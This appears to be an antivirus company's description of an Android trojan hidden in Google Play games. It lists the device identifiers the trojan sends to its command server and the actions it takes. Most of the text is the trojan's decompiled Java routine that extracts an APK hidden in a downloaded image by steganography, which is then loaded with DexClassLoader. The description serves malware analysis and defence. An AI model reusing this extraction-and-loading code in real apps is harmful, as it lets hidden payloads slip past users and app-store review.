SHA1: 6895c3258031b5750ce19aa7b67dd92db313e1be
It is a Trojan for Android devices that is embedded into various games published on Google Play.
Android.Xiny.19.origin sends the following information to the command and control server:
- IMEI identifier
- IMSI identifier
- Information about the mobile operator
- Presence of a memory card in a device
- Country
- Language
- MAC address
- Version of the operating system
- Package name and a version of an application that the Trojan is incorporated into
- Presence of the malicious application in the system folder
The Trojan can execute the following actions:
- Displays annoying advertisements
- Downloads applications and prompts a user to install various software
- Installs and deletes programs if root access is available on a device
- Launches arbitrary apk files hidden in images received from the C&C server
The way apk files are launched looks as follows: Android.Xiny.19.origin downloads a specially created image, which contains the corresponding file object hidden with the help of steganography, from the server. Then the Trojan retrieves the apk file using a special algorithm:
Code Expand source
package com.wch.c_direct.encrypt.logic;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;
import java.io.InputStream;
import java.util.Arrays;
public final class BitmapDecryptor {
public static byte[] decrypt(InputStream inputStream) {
int i5;
int i = 4;
int i1 = 8;
a.a();
Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
bitmap0.setHasAlpha(true);
byte[] buffer1 = new byte[i1];
int i2 = 0;
int i3 = 0;
int i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < i1) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < i1) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] buffer2 = BitmapDecryptor.a(buffer1);
i2 = 0;
i3 = 0;
while(i2 < i) {
i3 = i3 << 8 | buffer2[i2] & 255;
++i2;
}
buffer1 = new byte[i3 * 8 / 4];
i2 = 0;
i3 = 0;
i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < buffer1.length) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < buffer1.length) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] decrypted = BitmapDecryptor.a(buffer1);
bitmap0.recycle();
return Arrays.copyOfRange(decrypted, i, decrypted.length);
}
private static byte[] a(byte[] inBuffer) {
a.a();
byte[] outBuffer = new byte[inBuffer.length / 2];
int i;
for(i = 0; i < outBuffer.length; ++i) {
int i1;
for(i1 = 0; i1 < 2; ++i1) {
outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
}
}
return outBuffer;
}
}
After that, the malicious application loads the file into RAM of the infected device using the DexClassLoader class.
